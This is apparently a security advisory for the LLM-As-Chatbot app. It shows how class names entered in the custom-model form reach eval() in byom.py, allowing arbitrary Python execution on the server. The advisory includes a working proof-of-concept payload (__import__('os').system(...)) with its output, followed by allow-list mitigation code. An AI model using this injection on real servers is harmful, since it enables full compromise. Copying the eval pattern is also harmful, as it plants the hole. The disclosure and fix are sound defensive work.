When a user uploads a custom model, the model class and tokenizer class names supplied in the form are passed straight to `eval()`, so an attacker can execute arbitrary Python code on the server.

```python
# byom.py L-6
from transformers import AutoModelForCausalLM, AutoTokenizer


def load_model(
    base,
    finetuned,
    mode_cpu,
    mode_mps,
    mode_full_gpu,
    mode_8bit,
    mode_4bit,
    # force_download_ckpt,
    model_cls,
    tokenizer_cls
):
    if tokenizer_cls is None:
        tokenizer_cls = AutoTokenizer
    else:
        tokenizer_cls = eval(tokenizer_cls)   # user-controlled string evaluated as Python
    if model_cls is None:
        model_cls = AutoModelForCausalLM
    else:
        model_cls = eval(model_cls)           # user-controlled string evaluated as Python
```
Build

```bash
git clone https://github.com/deep-diver/LLM-As-Chatbot.git
cd LLM-As-Chatbot
pip install -r requirements.txt
```
Reproduce

Run app.py. It will output the following:

```
$ python app.py
/home/poc/anaconda3/envs/llm-serve/lib/python3.9/site-packages/auto_gptq/nn_modules/triton_utils/kernels.py:411: FutureWarning: `torch.cuda.amp.custom_fwd(args...)` is deprecated. Please use `torch.amp.custom_fwd(args..., device_type='cuda')` instead.
def forward(ctx, input, qweight, scales, qzeros, g_idx, bits, maxq):
/home/poc/anaconda3/envs/llm-serve/lib/python3.9/site-packages/auto_gptq/nn_modules/triton_utils/kernels.py:419: FutureWarning: `torch.cuda.amp.custom_bwd(args...)` is deprecated. Please use `torch.amp.custom_bwd(args..., device_type='cuda')` instead.
def backward(ctx, grad_output):
/home/poc/anaconda3/envs/llm-serve/lib/python3.9/site-packages/auto_gptq/nn_modules/triton_utils/kernels.py:461: FutureWarning: `torch.cuda.amp.custom_fwd(args...)` is deprecated. Please use `torch.amp.custom_fwd(args..., device_type='cuda')` instead.
@custom_fwd(cast_inputs=torch.float16)
CUDA extension not installed.
CUDA extension not installed.
Running on local URL: http://0.0.0.0:6006
To create a public link, set `share=True` in `launch()`.
```
Then open the running URL in a web browser.
Click the "custom model" button, which opens the custom-model page.
In the Base model class and Base tokenizer class input slots under Advanced options, enter the Python code chosen by the attacker. Here we use `__import__('os').system('uname -a')` for testing. Clicking the Confirm button below then triggers the code execution.
In the terminal we can see that the code has been executed:
```
Running on local URL: http://0.0.0.0:6006
To create a public link, set `share=True` in `launch()`.
Linux VICTIM 6.8.0-48-generic #48-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 27 14:04:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
Linux VICTIM 6.8.0-48-generic #48-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 27 14:04:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
tokenizer_cls: 0
model_cls: 0
Traceback (most recent call last):
```
Mitigation

It is possible to avoid `eval` entirely and use a safer alternative: replace `eval` with a controlled mapping from allowed names to model and tokenizer classes.
- Validate user input for model and tokenizer selection against a strict whitelist of expected class names.
- Reject inputs that do not match the allowed format (e.g., a regex for valid Python identifiers).
- Avoid dynamic imports or runtime evaluation; instead use dependency injection or configuration files to load the required models and tokenizers.
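A replacement for the two `eval()` calls along these lines, as an added example that is not code from LLM-As-Chatbot (the names `resolve_class`, `is_resolvable`, `UnknownClassError` and the contents of the allow-lists are assumptions). The user string is only ever used as a dictionary key, so nothing is evaluated, and the PoC payload above is rejected before the lookup.

```python
import re
from typing import Mapping, Optional

# Added example, not code from byom.py: allow-list lookup in place of eval().
# Names and the allow-list contents are assumptions for illustration.

# A bare Python identifier: no dots, parentheses, quotes or whitespace.
_CLASS_NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


class UnknownClassError(ValueError):
    """Raised when a requested class name is not on the allow-list."""


def resolve_class(name: Optional[str], allowed: Mapping[str, type], default: type) -> type:
    """Return the allow-listed class for `name`, or `default` when no name is given.

    Mirrors the original None check, but the else-branch becomes a lookup:
    anything that is not a plain, non-dunder identifier is refused, so
    __import__('os').system('uname -a') never reaches the mapping.
    """
    if name is None or name == "":
        return default
    if (not isinstance(name, str) or not _CLASS_NAME_RE.fullmatch(name)
            or name.startswith("__")):
        raise UnknownClassError(f"invalid class name: {name!r}")
    try:
        return allowed[name]
    except KeyError:
        raise UnknownClassError(f"class not allowed: {name!r}") from None


def is_resolvable(name: Optional[str], allowed: Mapping[str, type]) -> bool:
    """True if `name` would be accepted by resolve_class (useful for form validation)."""
    try:
        resolve_class(name, allowed, default=object)
        return True
    except UnknownClassError:
        return False


def transformers_allowlists():
    """Assumed allow-lists for the real app; the import is deferred so this
    module also loads where transformers is not installed."""
    from transformers import (AutoModelForCausalLM, AutoTokenizer,
                              LlamaForCausalLM, LlamaTokenizer)
    models = {"AutoModelForCausalLM": AutoModelForCausalLM, "LlamaForCausalLM": LlamaForCausalLM}
    tokenizers = {"AutoTokenizer": AutoTokenizer, "LlamaTokenizer": LlamaTokenizer}
    return models, tokenizers
```

In `load_model`, `eval(tokenizer_cls)` becomes `resolve_class(tokenizer_cls, tokenizers, AutoTokenizer)` and likewise for the model class, with the allow-lists built once at startup.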
Impact

This vulnerability allows attackers to execute arbitrary Python code, potentially leading to full server compromise: unauthorized access to sensitive data, manipulation of model behavior, deployment of malicious code, or complete control of the server.